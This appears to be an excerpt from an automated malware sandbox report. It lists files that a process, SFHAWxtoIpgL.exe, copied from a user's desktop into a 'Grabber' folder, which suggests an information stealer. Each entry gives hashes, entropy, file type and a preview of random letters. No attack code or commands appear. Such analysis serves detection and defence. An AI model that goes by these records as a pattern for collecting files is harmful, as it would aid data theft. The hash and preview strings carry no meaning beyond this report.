Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
